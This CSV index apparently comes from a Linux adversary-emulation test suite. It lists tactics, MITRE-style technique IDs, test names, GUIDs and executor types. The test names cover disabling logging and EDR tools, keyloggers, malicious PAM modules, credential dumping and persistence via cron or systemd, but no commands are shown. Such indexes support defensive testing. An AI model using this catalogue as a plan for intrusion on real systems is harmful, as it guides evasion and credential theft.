defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
defense-evasion,T1562,Impair Defenses,2,Disable journal logging via systemctl utility,c3a377f9-1203-4454-aa35-9d391d34768f,sh
defense-evasion,T1562,Impair Defenses,3,Disable journal logging via sed utility,12e5551c-8d5c-408e-b3e4-63f53b03379f,sh
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,2,Copy and Delete Mailbox Data on Linux,25e2be0e-96f7-4417-bd16-a4a2500e3802,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,5,Copy and Modify Mailbox Data on Linux,6d99f93c-da56-49e3-b195-163090ace4f6,bash
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall main configuration file,7b697ece-8270-46b5-bbc7-6b9e27081831,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,16,Disable iptables,7784c64e-ed0b-4b65-bf63-c86db229fd56,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,17,Modify/delete iptables firewall rules,899a7fb5-d197-4951-8614-f19ac4a73ad4,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,38,Clear History,23b88394-091b-4968-a42d-fb8076992443,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,39,Suspend History,94f6a1c9-aae7-46a4-9083-2bb1f5768ec4,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Reboot Linux Host via Kernel System Request,6d6d3154-1a52-4d1a-9d51-92ab8148b32e,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Create Account: Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,6,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
persistence,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
collection,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,6,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
credential-access,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
credential-access,T1040,Network Sniffing,10,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
credential-access,T1040,Network Sniffing,11,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
